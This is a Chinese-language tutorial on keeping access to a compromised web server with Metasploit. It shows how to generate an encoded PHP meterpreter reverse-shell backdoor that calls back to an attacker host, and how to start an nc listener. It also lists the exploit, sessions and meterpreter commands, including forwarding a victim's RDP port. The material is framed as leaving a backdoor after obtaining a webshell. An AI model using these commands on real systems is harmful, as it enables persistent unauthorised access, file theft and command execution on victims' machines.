msfpayload反彈shell

標籤：

1、前期--

情景就是當我們獲得webshell時，我們想留下我們的後門，這個時候我們可以用到msfpayload與msfconsole結合使用

啟動PostgreSQL服務：service postgresql start啟動metasploit服務：service metasploit start啟動msfconsole：msfconsole

查看資料庫連接狀態：db_status

產生後門檔案

msfpayload php/meterpreter/reverse_tcp LHOST=192.168.133.128 LPORT=5555 R | msfencode -e php/base64 -t raw -o /root/Desktop/exp.php

exp.php需要加上<?php  ?>

攻擊端啟動監聽

或者

nc 192.168.133.128 -lvp 5555

然後去訪問我們的後門檔案

2、大家想儲存我們得到的session怎麼辦？首先必須串連資料庫

exploit -h -e <opt>  The payload encoder to use.  If none is specified, ENCODER is used.  承載編碼，預設使用    -f        Force the exploit to run regardless of the value of MinimumRank.    -h        Help banner.    -j        Run in the context of a job.  在後台中運行    -n <opt>  The NOP generator to use.  If none is specified, NOP is used.    -o <opt>  A comma separated list of options in VAR=VAL format.    -p <opt>  The payload to use.  If none is specified, PAYLOAD is used.    -t <opt>  The target index to use.  If none is specified, TARGET is used.    -z        Do not interact with the session after successful exploitation  建立會話放到後台

sessions -h     -K        Terminate all sessions  殺死所有sessions    -c <opt>  Run a command on the session given with -i, or all 執行一個命令    -d <opt>  Detach an interactive session    -h        Help banner    -i <opt>  Interact with the supplied session ID   串連會話    -k <opt>  Terminate sessions by session ID and/or range    -l        List all active sessions    -q        Quiet mode    -r        Reset the ring buffer for the session given with -i, or all    -s <opt>  Run a script on the session given with -i, or all    -t <opt>  Set a response timeout (default: 15)    -u <opt>  Upgrade a shell to a meterpreter session on many platforms    -v        List verbose fields

 

3、meterpreter使用

Core Commands 代碼命令=============    Command                   Description    -------                   -----------    ?                         Help menu  查看協助    background                Backgrounds the current session 將sessions儲存到後台    bgkill                    Kills a background meterpreter script  殺死後台meterpreter指令碼    bglist                    Lists running background scripts 列出後台meterpreter指令碼    bgrun                     Executes a meterpreter script as a background thread   在後台進程中執行一個指令碼    channel                   Displays information about active channels  顯示活動的通道    close                     Closes a channel  關閉通道    disable_unicode_encoding  Disables encoding of unicode strings    enable_unicode_encoding   Enables encoding of unicode strings    exit                      Terminate the meterpreter session  退出    help                      Help menu    info                      Displays information about a Post module    interact                  Interacts with a channel    irb                       Drop into irb scripting mode  開啟ruby終端    load                      Load one or more meterpreter extensions    quit                      Terminate the meterpreter session    read                      Reads data from a channel    resource                  Run the commands stored in a file    run                       Executes a meterpreter script or Post module    use                       Deprecated alias for ‘load‘    write                     Writes data to a channelStdapi: File system Commands  檔案命令============================    Command       Description    -------       -----------    cat           Read the contents of a file to the screen    cd            Change directory    download      Download a file or directory    edit          Edit a file    getlwd        Print local working directory    getwd         Print working directory    lcd           Change local working directory    lpwd          Print local working directory    ls            List files    mkdir         Make directory    pwd           Print working directory    rm            Delete the specified file    rmdir         Remove directory    search        Search for files    upload        Upload a file or directoryStdapi: Networking Commands 網路命令===========================    Command       Description    -------       -----------    portfwd       Forward a local port to a remote service  連接埠轉寄
　　 portfwd  add -l 5555 -p 3389 -r 192.168.198.129  將192.168.198.129的3389連接埠轉寄到本地的5555連接埠Stdapi: System Commands=======================    Command       Description    -------       -----------    execute       Execute a command  執行命令    getenv        Get one or more environment variable values    getpid        Get the current process identifier    getuid        Get the user that the server is running as    kill          Terminate a process    ps            List running processes    shell         Drop into a system command shell  產生一個shell    sysinfo       Gets information about the remote system, such as OS  查看系統資訊

附上：初探meterpreter

msfpayload反彈shell